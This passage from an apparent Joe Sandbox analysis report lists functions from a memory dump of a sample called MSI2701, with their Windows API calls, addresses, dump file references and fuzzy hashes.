                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004E6F13
                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 004E6F1D
                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,?), ref: 004E6F2A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                            • Opcode ID: b6c4ff6e93b26665b5309f70874cbaa3ecb036545aec19ce86080c2ddcbd0d4f
                                                                                                                                                            • Instruction ID: 3f8c1bdcae8994d1026984b02c29a0d4dee4494f167a01ee0b975c092c48cebd
                                                                                                                                                            • Opcode Fuzzy Hash: b6c4ff6e93b26665b5309f70874cbaa3ecb036545aec19ce86080c2ddcbd0d4f
                                                                                                                                                            • Instruction Fuzzy Hash: BE31D374D01218ABCB21DF65D98878DBBB8AF18311F5041EAE81CA7290E7749B858F48
                                                                                                                                                            Function 004C45B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,C7C71CC4,00000001,00000000,?,00000000,00504460,000000FF,?,004C474D,004C3778,?,00000000,00000000,?), ref: 004C45DB
                                                                                                                                                            • LockResource.KERNEL32(00000000,?,00000000,00504460,000000FF,?,004C474D,004C3778,?,00000000,00000000,?,?,?,?,004C3778), ref: 004C45E6
                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00504460,000000FF,?,004C474D,004C3778,?,00000000,00000000,?,?,?), ref: 004C45F4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Resource$LoadLockSizeof
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2853612939-0
                                                                                                                                                            • Opcode ID: 906d294a4cbc434f02a220c3808a12dba402d270a6ee8a50aeec7e4aada55fcb
                                                                                                                                                            • Instruction ID: 337cdf0e446b8472719a51b0b7e214a5c1578e10693c370c179d2d6b8d11cac0
                                                                                                                                                            • Opcode Fuzzy Hash: 906d294a4cbc434f02a220c3808a12dba402d270a6ee8a50aeec7e4aada55fcb
                                                                                                                                                            • Instruction Fuzzy Hash: B811C436A046549BC7248F59D954F7BB7A8E79A725F00462FEC16C3344E63DAC048A94
                                                                                                                                                            Function 004FE111 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
                                                                                                                                                              • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(004FE237,00000001,00000000,?,-00000050,?,004FE868,00000000,?,?,?,00000055,?), ref: 004FE183
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                            • String ID: hO
                                                                                                                                                            • API String ID: 2417226690-2557914918
                                                                                                                                                            • Opcode ID: fd8a7fa75bdf8609e7a75a27e53e32f9df0c9f7de4e8ff1b6c816830ce635e45
                                                                                                                                                            • Instruction ID: 94e9d4644604a95b2206509d4c50cd9c50eea727133d083b3715b3331a0ce6d5
                                                                                                                                                            • Opcode Fuzzy Hash: fd8a7fa75bdf8609e7a75a27e53e32f9df0c9f7de4e8ff1b6c816830ce635e45
                                                                                                                                                            • Instruction Fuzzy Hash: 4211293A2007099FDB189F3AC8915BBB791FF84719B15442DE64647B50E3757942CB44
                                                                                                                                                            Function 004F76AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,004F4E3F,?,20001004,00000000,00000002,?,?,004F4441), ref: 004F76E3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2299586839-2395104290
                                                                                                                                                            • Opcode ID: f033e463de4589d723b2659af29fb0c2ae3ff31154554a5b4a1027686cf7e020
                                                                                                                                                            • Instruction ID: bd47b17c3c811fe80c450c928a13b648c792afc6da727f1c05abe94ff3e003e2
                                                                                                                                                            • Opcode Fuzzy Hash: f033e463de4589d723b2659af29fb0c2ae3ff31154554a5b4a1027686cf7e020
                                                                                                                                                            • Instruction Fuzzy Hash: D3E04F3654861DBBCF122F61DC08ABE3E26EF487A0F004016FE0565261CB3D9921AAD9
                                                                                                                                                            Function 004EE270 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                            • Instruction ID: 6ed22beed5a96dd4eb3f2724738b7cd9d15095dd7d891ba586c3b004edcbcd79
                                                                                                                                                            • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                            • Instruction Fuzzy Hash: 48F16271E002599FDF14CFAAD980AAEB7B1FF88315F15826AE815A7391D7349E01CF84
                                                                                                                                                            Function 004EA587 Relevance: 2.8, Strings: 2, Instructions: 344COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 0$TQ
                                                                                                                                                            • API String ID: 0-1234872255
                                                                                                                                                            • Opcode ID: e312e784168ff8d0ae80082596154f8691f7869a76059560e90113d9a4bc6084
                                                                                                                                                            • Instruction ID: 57610e852c865d2fbf47344143c4e3e64c04ec41de6e7cbd207c660ba20932a1
                                                                                                                                                            • Opcode Fuzzy Hash: e312e784168ff8d0ae80082596154f8691f7869a76059560e90113d9a4bc6084
                                                                                                                                                            • Instruction Fuzzy Hash: BAC1BE749006858FCB24CE2AC49467FBBB1BF05306F244A1FD49697351C728FD66CB5A
                                                                                                                                                            Function 004F7B1F Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,004F7F64,00000000,00000000,00000000), ref: 004F7E23
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InformationTimeZone
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 565725191-0
                                                                                                                                                            • Opcode ID: 232a98e091ff6db2d17b6929bdb668d775f71dda3316be7dda185b1fa1d3f6a1
                                                                                                                                                            • Instruction ID: 3220fc75d8fcdf15a8e257f50fc88293eaf5378732afa83f29ddb3454721165f
                                                                                                                                                            • Opcode Fuzzy Hash: 232a98e091ff6db2d17b6929bdb668d775f71dda3316be7dda185b1fa1d3f6a1
                                                                                                                                                            • Instruction Fuzzy Hash: FAC14772E04119ABDB10AB65DC02ABFBBB9EF05714F51405BFA00EB291E77C9E41C798
                                                                                                                                                            Function 004F84BD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004F84B8,?,?,00000008,?,?,005014E4,00000000), ref: 004F86EA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                            • Opcode ID: f9b62fe0c9d9b6473b71a0a9b4fafc23e02c37c9491f9ae462bbdb833fd8df04
                                                                                                                                                            • Instruction ID: a964cc155e9a30906a7af58cbda9e42fdaa9f1eb50a3eb231b932763789229ef
                                                                                                                                                            • Opcode Fuzzy Hash: f9b62fe0c9d9b6473b71a0a9b4fafc23e02c37c9491f9ae462bbdb833fd8df04
                                                                                                                                                            • Instruction Fuzzy Hash: 0BB12A31610608DFD714CF28C48AB657BE0FF45364F25865DEA9ACF2A1CB39E952CB44
                                                                                                                                                            Function 004E35A9 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004E35BF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                            • Opcode ID: 3594091b2af8dbcf13c46a4da996d19f565581bca9a32a4468ee16862007a022
                                                                                                                                                            • Instruction ID: d701063ed46d04caaa6a19d45a325527e412b9e7ebb7057c3d4879f97f71bf6a
                                                                                                                                                            • Opcode Fuzzy Hash: 3594091b2af8dbcf13c46a4da996d19f565581bca9a32a4468ee16862007a022
                                                                                                                                                            • Instruction Fuzzy Hash: C7517DB1900215CFDB26CF6AE8897AABBF0FB08346F14C42AC805EB350D3799A04DF54
                                                                                                                                                            Function 004FAF79 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7e6a7f534cd6cfdf7cc391b075cd49db2a616ab825ec4671b744ed6eb4296970
                                                                                                                                                            • Instruction ID: 60ebe0ea72276ba3d401d182db9c3a34a1ebffd3acacde19faa1e0e1cef558df
                                                                                                                                                            • Opcode Fuzzy Hash: 7e6a7f534cd6cfdf7cc391b075cd49db2a616ab825ec4671b744ed6eb4296970
                                                                                                                                                            • Instruction Fuzzy Hash: C931F7B290021DAFCB20DFA9CCC5DBBB77DEB85354F14415AFA15D7240EA34AD408BA4
                                                                                                                                                            Function 004FE48A Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
                                                                                                                                                              • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004FE4DE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                            • Opcode ID: b25611fa9c8f5fdab98e1110545faacdac9257d4ebcdb48ec52e9dde47af9f16
                                                                                                                                                            • Instruction ID: 4d7ea4333e2ca0f9cab0db998c85983219d7c26a726eb0fec8b4b78d68102745
                                                                                                                                                            • Opcode Fuzzy Hash: b25611fa9c8f5fdab98e1110545faacdac9257d4ebcdb48ec52e9dde47af9f16
                                                                                                                                                            • Instruction Fuzzy Hash: 9321A17260421AABDB289F66DC41ABB73A8EF04319B10106FFA01C6261EA78ED048758
                                                                                                                                                            Function 004FE6B9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
                                                                                                                                                              • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004FE453,00000000,00000000,?), ref: 004FE6E5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                            • Opcode ID: ed288dd16ea31bcc22f9675efe911344009e982800ff44d6837a47506be38a6d
                                                                                                                                                            • Instruction ID: f180f9ffcdd2494bcfa4b86727ce78705436ab62a846cd1c65a13276a2cf9837
                                                                                                                                                            • Opcode Fuzzy Hash: ed288dd16ea31bcc22f9675efe911344009e982800ff44d6837a47506be38a6d
                                                                                                                                                            • Instruction Fuzzy Hash: D6F0233650011ABBDB286752CC05BBF77D8EB40755F15046ADF05E3290DA3CFD01C594
                                                                                                                                                            Function 004FE1AC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
                                                                                                                                                              • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(004FE48A,00000001,?,?,-00000050,?,004FE82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004FE1F6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                            • Opcode ID: 4ba80e1ac895ffa27be1f70fb3094cf20598fe86d0a8ecbd11222f938b39f329
                                                                                                                                                            • Instruction ID: c8808421617b5b7969bf4f4f40fe5db808cc30b7fc40113fde7d519a49bdfbac
                                                                                                                                                            • Opcode Fuzzy Hash: 4ba80e1ac895ffa27be1f70fb3094cf20598fe86d0a8ecbd11222f938b39f329
                                                                                                                                                            • Instruction Fuzzy Hash: 17F0463620030C5FCB246F3B8C85A7B7B94FF80728F05442EFB018B6A0D6B5AC02CA58
                                                                                                                                                            Function 004F7132 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004F1C9A: EnterCriticalSection.KERNEL32(-0051DE50,?,004F3576,?,0051A078,0000000C,004F3841,?), ref: 004F1CA9
                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(004F7125,00000001,0051A1D8,0000000C,004F7554,00000000), ref: 004F716A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                                            • Opcode ID: 42f31b3095a28d267ae6b287767813e06844e7bb095449989b068d8b1767f137
                                                                                                                                                            • Instruction ID: f03075f32c98635215ae5e2b6394c2b2e3569e2cd5eb0e409a003384d51b1e07
                                                                                                                                                            • Opcode Fuzzy Hash: 42f31b3095a28d267ae6b287767813e06844e7bb095449989b068d8b1767f137
                                                                                                                                                            • Instruction Fuzzy Hash: 28F0AF72A40204DFD701DF99D906BAC7BF0FB48325F00815AF900DB2A0D7795904DF44
                                                                                                                                                            Function 004FE0C6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
                                                                                                                                                              • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(004FE01F,00000001,?,?,?,004FE88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004FE0FD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                            • Opcode ID: 4f286635ac117e38fa802be0114a96b85b688c0504455eeb229fbfcc9f4716bb
                                                                                                                                                            • Instruction ID: 30816253a75bf95968da4f96beee30250ae17e8acb686cff6b1a42605146936b
                                                                                                                                                            • Opcode Fuzzy Hash: 4f286635ac117e38fa802be0114a96b85b688c0504455eeb229fbfcc9f4716bb
                                                                                                                                                            • Instruction Fuzzy Hash: 1FF05C3530020D5BCB14AF36C84567A7F94EFC1711F060059EB058B260C6799842C754
                                                                                                                                                            Function 004E23F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,004E00E2,00000000,00000000,00000004,004DED14,00000000,00000004,004DF127,00000000,00000000), ref: 004E2410
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
